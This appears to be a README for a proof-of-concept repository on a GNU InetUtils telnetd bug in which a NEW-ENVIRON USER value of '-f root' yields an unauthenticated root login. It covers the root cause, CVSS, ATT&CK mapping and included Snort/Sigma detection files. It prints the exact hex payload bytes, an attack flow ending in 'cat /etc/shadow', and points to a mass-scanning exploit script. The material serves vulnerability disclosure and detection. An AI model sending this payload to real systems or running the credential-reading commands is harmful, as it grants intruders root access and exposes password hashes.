
GNU InetUtils telnetd - Unauthenticated Remote Root via NEW-ENVIRON Variable Injection.
GNU InetUtils telnetd - Unauthenticated Remote Root via NEW-ENVIRON Variable Injection
Overview - Technical Analysis - Affected Versions - Usage - Remediation - References
CVE-2026-24061 is a critical authentication bypass vulnerability in the telnetd daemon distributed as part of GNU InetUtils. The flaw resides in the handling of the Telnet NEW-ENVIRON option (RFC 1572) during the initial protocol handshake.
The root cause is a failure to sanitize client-supplied environment variables before passing them to the login(1) program. When the Telnet daemon receives a NEW-ENVIRON IS sub-negotiation packet containing the variable USER with the value -f root, it passes this unsanitized value directly to the system login binary.
On systems where login accepts the -f flag (force login without password verification), this results in an unauthenticated root session being granted to the remote attacker.
This vulnerability class has historical precedent: CVE-2001-0797 in SysV telnetd and the well-known Linux telnetd -f bypass from 1994 exploited the same fundamental failure to sanitize environment-sourced arguments passed to privileged binaries.
No credentials required. No prior access needed. A single network packet sequence achieves root.
GNU InetUtils telnetd processes NEW-ENVIRON (option code 0x27, per RFC 1572) sub-negotiation to collect client-supplied environment variables. These variables are assembled into an argument vector and passed to execve(2) when spawning login(1).
The vulnerability is triggered as follows:
IAC DO NEW-ENVIRON, soliciting environment variables from the client.IAC WILL NEW-ENVIRON.IAC SB NEW-ENVIRON SEND IAC SE.IAC SB NEW-ENVIRON IS
VAR "USER" VALUE "-f root"
IAC SE
telnetd constructs the login invocation as login -f root.login(1) interprets -f as "force login, skip authentication" and logs in the specified user (root) without requiring a password.| Step | Direction | Telnet Bytes (hex) | Meaning |
|---|---|---|---|
| 1 | S -> C | FF FD 27 | IAC DO NEW-ENVIRON |
| 2 | C -> S | FF FB 27 | IAC WILL NEW-ENVIRON |
| 3 | S -> C | FF FA 27 01 FF F0 | IAC SB NEW-ENVIRON SEND IAC SE |
| 4 | C -> S | FF FA 27 00 00 55 53 45 52 01 2D 66 20 72 6F 6F 74 FF F0 | IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f root" IAC SE |
-f root WorksThe login(1) binary on many Linux systems accepts the -f <user> flag for "pre-authenticated" logins, historically used by terminal multiplexers and rlogin. When telnetd builds its exec call and fails to strip leading hyphens or validate option-like strings in environment variable values, it inadvertently passes attacker-controlled flags directly to login.
The effective call becomes:
execve("/bin/login", ["login", "-f", "root"], envp);
Attacker Vulnerable telnetd (port 23)
| |
|------- TCP SYN (port 23) ----------------------->|
|<------ TCP SYN-ACK -------------------------------|
|------- TCP ACK ---------------------------------->|
| |
|<------ Telnet banner + IAC DO NEW-ENVIRON --------|
|------- IAC WILL NEW-ENVIRON --------------------->|
|<------ IAC SB NEW-ENVIRON SEND IAC SE ------------|
| |
|------- IAC SB NEW-ENVIRON IS |
| VAR "USER" VALUE "-f root" IAC SE -------->|
| |
| [telnetd calls: login -f root] |
| |
|<------ Root shell prompt (#) ---------------------|
| |
|------- id; whoami; cat /etc/shadow -------------->|
|<------ uid=0(root) root /etc/shadow contents -----|
Prerequisites:
telnetd (TCP/23 open)inetutilslogin(1) binary supports the -f flag (standard on most Linux distributions)| Software | Affected Versions | Status |
|---|---|---|
| GNU InetUtils telnetd | <= 2.x (specific patched version TBD) | Vulnerable |
| Distributions shipping unpatched GNU inetutils | Various | Check vendor advisory |
Verify whether your distribution ships a patched version. Many modern systems have Telnet disabled by default; exposure requires an explicitly running
telnetd.
| Metric | Value |
|---|---|
| CVSS v3.1 Base Score | 9.8 (Critical) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
| Vector String | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| ATT&CK ID | Tactic | Technique | Relevance |
|---|---|---|---|
| T1190 | Initial Access | Exploit Public-Facing Application | Direct exploitation of telnetd over the network |
| T1059 | Execution | Command and Scripting Interpreter | Shell execution post-exploitation |
| T1078.004 | Privilege Escalation / Defense Evasion | Valid Accounts: Local Accounts | Authentication bypass yields a valid root session |
| T1548 | Privilege Escalation | Abuse Elevation Control Mechanism | login -f flag abused to bypass PAM/authentication |
| T1046 | Discovery | Network Service Discovery | Mass scanning component of the PoC |
Requirements: Python 3 (standard library only, zero external dependencies).
git clone https://github.com/franckferman/CVE_2026_24061.git
cd CVE_2026_24061
No pip install needed. Both scripts use only the Python standard library.
poc_cve_2026_24061.py # Simple PoC (~100 lines) - understand the vulnerability
cve_2026_24061.py # Industrialized exploit - multithreaded, CIDR, CSV/JSON export
scripts/
generate_signatures.py # Auto-generate Snort/Suricata + Sigma rules from payload
generate_misp_event.py # Generate MISP-importable event JSON
generate_stix_bundle.py # Generate STIX 2.1 bundle (MISP, OpenCTI, TAXII)
signatures/
snort.rules # Snort/Suricata detection rules (auto-generated)
sigma.yml # Sigma rule for SIEM (auto-generated)
indicators/
misp_event.json # MISP event - import via Events > Add Event > Import
stix_bundle.json # STIX 2.1 bundle - 11 objects (vuln, indicator, ATT&CK, CoA)